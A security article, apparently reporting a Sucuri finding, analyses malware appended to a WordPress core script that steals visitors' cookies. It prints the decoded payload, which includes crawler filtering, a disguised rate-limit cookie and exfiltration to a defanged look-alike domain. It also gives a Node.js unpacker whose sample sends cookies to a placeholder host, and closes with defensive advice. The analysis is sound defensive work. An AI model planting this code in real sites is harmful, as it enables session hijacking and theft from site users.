Malware sending WordPress Cookies to fake WordPressAPI



Sucuri researchers warned that the domain “code.wordprssapi.com” was recently used to steal WordPress cookies and hijack sessions. An attacker who obtains a logged-in user's session cookie can present it to the site and act as that user, with every permission that user holds, without ever knowing the password.

A cookie is a small piece of data sent by a website and stored on the user's computer by the browser, which returns it with each later request to that site. Cookies were designed as a reliable way for websites to remember stateful information (such as items added to a shopping cart) or to record a user's activity (a login, particular buttons clicked, pages visited). For WordPress the ones that matter here are the login cookies that identify an authenticated session: whoever holds a valid copy is treated as that user until the cookie expires or is invalidated.


The attackers also chose a domain name that does not look suspicious at a glance: wordprssapi.com is a one-letter misspelling of “wordpressapi” and reads like a legitimate WordPress service (the genuine WordPress update and plugin API is served from api.wordpress.org), so the outbound request is easy to overlook in traffic logs or during a source review. The impact is greatest for administrator sessions, which carry full control of the site.

The attackers modified a legitimate WordPress core file, wp-includes/js/hoverIntent.min.js, appending code obfuscated with the widely used eval(function(p,a,c,k,e,d){...}) packer at the bottom of the file. Because the file is loaded by the site's own pages, the payload runs in the browser of every visitor, including logged-in administrators.


Sucuri researchers decoded the code and found the following:

function adsadsgg() {
  // Run only once per day per victim: the _utmzz marker cookie (named to blend in
  // with the Google Analytics __utm* cookies) is set below after the first run.
  var gd = document.cookie.indexOf("_utmzz=");
  // Skip search-engine crawlers, whose cookies would be worthless to the attacker.
  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {
    // Exfiltrate on only half of the eligible visits, which keeps the outbound
    // requests sparse and harder to notice.
    var rd = Math.floor(Math.random() * 2);
    if (rd == 0) {
      // Leak document.cookie to the attacker's server as a query string on a
      // <script> GET request; the response does not need to be valid JavaScript.
      var sss = document.createElement('script');
      sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);
      document.body.appendChild(sss)
    }
    // Set the 24-hour marker so this visitor is not hit again today.
    var dd = new Date();
    dd.setTime(dd.getTime() + 86400000);
    window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString()
  }
}
// Fire after the page is ready, using jQuery when WordPress has loaded it.
if (typeof(jQuery) != 'undefined') {
  jQuery(function() {
    adsadsgg()
  })
} else {
  window.onload = function() {
    adsadsgg()
  }
}

Several details of the decoded code are there to keep the stolen data useful and the theft quiet. The user-agent check at the top skips search-engine spiders, so what reaches the attackers comes from real browsers and is more likely to be usable immediately. The _utmzz cookie, named to resemble the Google Analytics __utmz cookie, is set for 24 hours after the first run, so each victim is exfiltrated at most once a day, and the random gate (rd == 0) halves the number of outbound requests on top of that. The exfiltration itself is a plain GET: the script element's src carries escape(document.cookie) in the query string to code.wordprssapi.com, and the request is complete the moment the browser fetches it, whatever the server returns.
One check worth doing on your own site: document.cookie cannot read cookies flagged HttpOnly, and WordPress core sets its login cookies with that flag, so on an unmodified install what this script can reach is the non-HttpOnly cookies (wp-settings-*, plus anything set by plugins, themes or other scripts without the flag). Run document.cookie in the browser console while logged in as an administrator; whatever appears there is exactly what this payload would have sent.
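The two analysis steps above, decoding the eval(function(p,a,c,k,e,d){...}) packer and reading off what the payload does, can be done without ever executing the malware. The following Node.js script is an added example written for this article, not Sucuri's tooling or WordPress code: it parses the packer's argument list, replays the packer's own token-substitution algorithm (the same index encoding its inner e() function uses), and then triages the decoded JavaScript for the indicators seen in the hoverIntent.min.js sample. SAMPLE_PACKED is a constructed stand-in for the real payload, and example.invalid is a placeholder domain, not the attacker's.

```javascript
// Added example: statically unpack a p,a,c,k,e,d packer payload and triage the result.
// SAMPLE_PACKED is constructed for this example; example.invalid is a placeholder domain.
const SAMPLE_PACKED = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 2=0.3(\'1\');2.4="https://example.invalid/?c="+5(0.6);0.7.8(2)',10,10,'document|script|s|createElement|src|escape|cookie|body|appendChild|var'.split('|'),0,{}))`;

// Locates the packer's argument list ('packed', base, count, 'words'.split('|')).
// This depends only on the call, not on which variant of the decoder body is used.
const CALL_RE = /\}\('((?:\\.|[^'\\])*)',\s*(\d+),\s*(\d+),\s*'((?:\\.|[^'\\])*)'\.split\('\|'\)/;

// Undo the backslash escaping the packer applies to its single-quoted arguments.
function unescapeArg(s) {
  const map = { n: '\n', r: '\r', t: '\t' };
  return s.replace(/\\(.)/g, (_, ch) => (ch in map ? map[ch] : ch));
}

// Same index-to-token encoding as the packer's inner e() function:
// 0..35 become 0-9a-z, 36..61 become A-Z, larger indices use positional notation.
function encodeIndex(c, base) {
  const head = c < base ? '' : encodeIndex(Math.floor(c / base), base);
  const r = c % base;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Returns the decoded JavaScript without evaluating anything from the payload.
function unpackPacker(src) {
  if (!/^\s*eval\(function\(p,a,c,k,e,d\)/.test(src)) {
    throw new Error('not a p,a,c,k,e,d packer payload');
  }
  const m = CALL_RE.exec(src);
  if (!m) throw new Error('could not locate packer arguments');
  let p = unescapeArg(m[1]);
  const base = parseInt(m[2], 10);
  let count = parseInt(m[3], 10);
  const words = unescapeArg(m[4]).split('|');
  // Replays: while(c--) if(k[c]) p = p.replace(new RegExp('\b'+e(c)+'\b','g'), k[c]).
  // A function replacer stops a '$' inside a word from being read as a replacement pattern.
  while (count--) {
    if (words[count]) {
      const re = new RegExp('\\b' + encodeIndex(count, base) + '\\b', 'g');
      p = p.replace(re, () => words[count]);
    }
  }
  return p;
}

// Crude triage of decoded JavaScript for the behaviours the Sucuri sample shows:
// cookie access, script-tag injection, crawler filtering, and any hard-coded URLs.
function triage(js) {
  return {
    readsCookie: /document\.cookie/.test(js),
    injectsScript: /createElement\(['"]script['"]\)/.test(js),
    filtersBots: /Googlebot|Bingbot|Yandex|Slurp/i.test(js),
    urls: js.match(/https?:\/\/[^\s"'+)]+/g) || [],
  };
}

const decoded = unpackPacker(SAMPLE_PACKED);
console.log(decoded);
console.log(triage(decoded));
```

To use it on a real file, paste the appended eval(...) block from the end of the suspect .js file into SAMPLE_PACKED (or read it from disk) and review the decoded output and the extracted URLs; any domain in that list that is not one you serve or a known CDN is what to block and hunt for in access logs.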


To conclude, the attackers relied on tricks that evade a casual review: a core file nobody expects to change, a packer that hides the payload, a look-alike domain, and rate limiting that keeps the exfiltration sparse. Webmasters can avoid falling victim by checking, not just reading, their files: compare core files against a pristine copy of the same WordPress release (WP-CLI's wp core verify-checksums does this), treat any eval(function(p,a,c,k,e,d) block appended to a minified core script as hostile until proven otherwise, and confirm that every domain a page loads scripts from is one you recognise rather than one that merely looks familiar. If a site has been serving this code, cleaning the file is not enough: changing the keys and salts in wp-config.php invalidates every existing login cookie, and administrators should change their passwords as well.
